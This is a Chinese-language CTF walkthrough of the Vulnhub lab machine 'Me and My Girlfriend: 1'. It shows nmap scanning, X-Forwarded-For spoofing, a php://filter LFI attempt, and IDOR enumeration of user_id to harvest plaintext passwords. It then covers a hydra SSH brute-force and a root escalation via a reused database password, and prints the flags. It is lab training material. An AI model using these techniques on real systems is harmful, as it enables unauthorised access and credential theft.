Vulnhub之Me and Mygirlfriend详细测试过程

Me and Mygirlfriend

作者:jason huawen

靶机信息

名称: Me and My Girlfriend: 1

地址:

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:61:8a:f1      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.254  08:00:27:87:26:b3      1      60  PCS Systemtechnik GmbH            

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 20:16 EDT
Nmap scan report for www.armour.local (192.168.56.254)
Host is up (0.000071s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57e15658460433563dc34ba793ee2316 (DSA)
|   2048 3b264de4a03bf875d96e1555828c7197 (RSA)
|   256 8f48979b55115bf16c1db34abc36bdb0 (ECDSA)
|_  256 d0c302a1c4c2a8ac3b84ae8fe5796676 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 08:00:27:87:26:B3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.87 seconds
                                                                            

NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254                       
Who are you? Hacker? Sorry This Site Can Only Be Accessed local!<!-- Maybe you can search how to use x-forwarded-for -->

站点只能从本地访问,而且提示是在请求头中设置x-forwarded-for

可以用burpsuite拦截请求,然后增加x-forwarded-for:127.0.0.1

┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254/robots.txt
User-Agent: *
Allow: /heyhoo.txt         
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254/heyhoo.txt
Great! What you need now is reconn, attack and got the shell     

此时成功得到页面:

不过用Burpsuite每次修改请求比较麻烦,可以用浏览器的插件IP,伪装X-Forwarded-For字段

从URL来看,是否会存在本地文件包含漏洞?

http://192.168.56.254/index.php?page=login

但经过测试,没有得到任何返回,不过也没有报错

用PHP filter也没有成功

http://192.168.56.254/index.php?page=php://filter/convert.base64-encode/resource=index

用burpsuite拦截请求,并将请求存储为文件,然后用sqlmap扫描,看是否存在SQL注入漏洞?

(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sqlmap -r req.txt --level=5

SQLMAP并没有发现出SQL注入漏洞。

接下来注册一个用户test,看有什么发现?以test用户登录后

注意这里的URL:

http://192.168.56.254/index.php?page=dashboard&user_id=14

我们看是否可以通过修改user_id值进行水平攻击

当修改user_id=1时,查看profile

注意此时查看页面源代码,竟然有用户的明文密码:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Ceban Corp</title>
    <style>
        .center {
            text-align: center;
        }
    </style>
</head>
<body>

    <div class="center">
        <h2>Welcome To Ceban Corp</h2>
        <p>Inspiring The People To Great Again!</p>
        <hr>
                <p><a href="?page=dashboard">Dashboard</a> | <a href="?page=profile&user_id=14">Profile</a> | <a href="?page=logout">Logout</a></p>
                <hr>
    </div>

    <form action="#" method="POST">
    <label for="name">Name</label>
    <input type="text" name="name" id="name" value="Eweuh Tandingan"><br>
    <label for="username">Username</label>
    <input type="text" name="username" id="username" value="eweuhtandingan"><br>
    <label for="password">Password</label>
    <input type="password" name="password" id="password" value="skuyatuh"><br>
    <button disabled="disabled">Change</button>
</form>

</body>
</html>

那该用户名和密码是否也是SSH的用户名和密码?但发现不成功,可以将所有的用户的用户名和密码都收集起来:(即依次将user_id枚举从1到没有返回内容为止)

┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ ssh eweuhtandingan@192.168.56.254                              
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:xQf3lfh03E3NNnt5rN/N5zVlGxJJo8QcKykWWCSg1SM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
eweuhtandingan@192.168.56.254's password: 
Permission denied, please try again.
eweuhtandingan@192.168.56.254's password: 

──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ cat users.dict 
eweuhtandingan
aingmaung
sundatea
sedihaingmah
alice
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ cat pass.dict 
skuyatuh
qwerty!!!
indONEsia
cedihhihihi
4lic3
                
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ hydra -L users.dict -P pass.dict ssh://192.168.56.254                 
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-08 21:09:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.56.254:22/
[22][ssh] host: 192.168.56.254   login: alice   password: 4lic3
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-08 21:09:20

┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ ssh alice@192.168.56.254         
alice@192.168.56.254's password: 
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$ id
uid=1000(alice) gid=1001(alice) groups=1001(alice)
alice@gfriEND:~$ ls -alh
total 32K
drwxr-xr-x 4 alice alice 4.0K Dec 13  2019 .
drwxr-xr-x 6 root  root  4.0K Dec 13  2019 ..
-rw------- 1 alice alice   10 Dec 13  2019 .bash_history
-rw-r--r-- 1 alice alice  220 Dec 13  2019 .bash_logout
-rw-r--r-- 1 alice alice 3.6K Dec 13  2019 .bashrc
drwx------ 2 alice alice 4.0K Dec 13  2019 .cache
drwxrwxr-x 2 alice alice 4.0K Dec 13  2019 .my_secret
-rw-r--r-- 1 alice alice  675 Dec 13  2019 .profile
alice@gfriEND:~$ cat .bash_history 
exit
exit
alice@gfriEND:~$ cd .my_secret/
alice@gfriEND:~/.my_secret$ ls -alh
total 16K
drwxrwxr-x 2 alice alice 4.0K Dec 13  2019 .
drwxr-xr-x 4 alice alice 4.0K Dec 13  2019 ..
-rw-r--r-- 1 root  root   306 Dec 13  2019 flag1.txt
-rw-rw-r-- 1 alice alice  119 Dec 13  2019 my_notes.txt
alice@gfriEND:~/.my_secret$ cat flag1.txt 
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
alice@gfriEND:~/.my_secret$ cat my_notes.txt 
Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, hopefully Bob doesn't know my notes
alice@gfriEND:~/.my_secret$ cd /home
alice@gfriEND:/home$ ls -alh
total 24K
drwxr-xr-x  6 root           root           4.0K Dec 13  2019 .
drwxr-xr-x 22 root           root           4.0K Dec 13  2019 ..
drwxr-xr-x  2 aingmaung      aingmaung      4.0K Dec 13  2019 aingmaung
drwxr-xr-x  4 alice          alice          4.0K Dec 13  2019 alice
drwxr-xr-x  2 eweuhtandingan eweuhtandingan 4.0K Dec 13  2019 eweuhtandingan
drwxr-xr-x  2 sundatea       sundatea       4.0K Dec 13  2019 sundatea

至此得到了第一Flag.

提权

alice@gfriEND:/var/www/html$ cd config
alice@gfriEND:/var/www/html/config$ ls -alh
total 12K
drwxrwxr-x 2 root root 4.0K Dec 13  2019 .
drwxr-xr-x 5 root root 4.0K Dec 13  2019 ..
-rw-rw-r-- 1 root root   88 Dec 13  2019 config.php
alice@gfriEND:/var/www/html/config$ cat config.php 
<?php

    $conn = mysqli_connect('localhost', 'root', 'ctf_pasti_bisa', 'ceban_corp');
alice@gfriEND:/var/www/html/config$ su - root
Password: 
root@gfriEND:~# cd /root
root@gfriEND:~# ls -alh
total 32K
drwx------  3 root root 4.0K Dec 13  2019 .
drwxr-xr-x 22 root root 4.0K Dec 13  2019 ..
-rw-------  1 root root    0 Dec 13  2019 .bash_history
-rw-r--r--  1 root root 3.1K Feb 20  2014 .bashrc
drwx------  2 root root 4.0K Dec 13  2019 .cache
-rw-r--r--  1 root root 1000 Dec 13  2019 flag2.txt
-rw-------  1 root root  238 Dec 13  2019 .mysql_history
-rw-------  1 root root   81 Dec 13  2019 .nano_history
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
root@gfriEND:~# cat flag2.txt 

  ________        __    ___________.__             ___________.__                ._.
 /  _____/  _____/  |_  \__    ___/|  |__   ____   \_   _____/|  | _____     ____| |
/   \  ___ /  _ \   __\   |    |   |  |  \_/ __ \   |    __)  |  | \__  \   / ___\ |
\    \_\  (  <_> )  |     |    |   |   Y  \  ___/   |     \   |  |__/ __ \_/ /_/  >|
 \______  /\____/|__|     |____|   |___|  /\___  >  \___  /   |____(____  /\___  /__
        \/                              \/     \/       \/              \//_____/ \/

Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)

Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73

Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
root@gfriEND:~# 

至此得到了root shell和root flag.本靶机提权部分比较简单,只要细心点,就可以找到配置漏洞。

热门相关:帝少的专属:小甜心,太缠人   仗剑高歌   薄先生,情不由己   时间都知道   大神你人设崩了